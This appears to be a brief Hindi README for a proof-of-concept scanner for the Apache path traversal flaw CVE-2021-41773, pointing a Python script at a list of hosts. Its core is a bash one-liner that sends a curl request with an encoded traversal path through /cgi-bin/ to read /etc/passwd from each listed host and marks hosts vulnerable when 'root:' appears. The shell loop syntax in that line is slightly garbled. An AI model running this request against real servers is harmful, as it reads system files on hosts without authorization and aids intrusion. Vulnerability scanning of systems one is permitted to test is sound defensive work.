
प्रूफ-ऑफ-कॉन्सेप्ट स्कैनर जो CVE-2021-41773 Apache पाथ ट्रैवर्सल भेद्यता के लिए होस्ट की जांच करता है, कमजोर या कमजोर नहीं स्थिति की रिपोर्ट करता है।
होस्ट्स की CVE-2021-41773 के प्रति संवेदनशीलता जांचने के लिए एक त्वरित और कच्चा प्रमाण-अवधारणा।
python3 full.py hosts.txt
जहां hosts.txt में आपके लक्ष्य होते हैं:
domain.com
blah.com
192.168.1.1
यह प्रिंट करेगा कि होस्ट संवेदनशील है या संवेदनशील नहीं है।
bash का Python संस्करण:
cat hosts.txt | while read host do ; do curl -k --silent --path-as-is --insecure "$host/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd" | grep "root:*" && echo "$host \033[0;31mVulnerable\n" || echo "$host \033[0;32mNot Vulnerable\n";done
आनंद लें!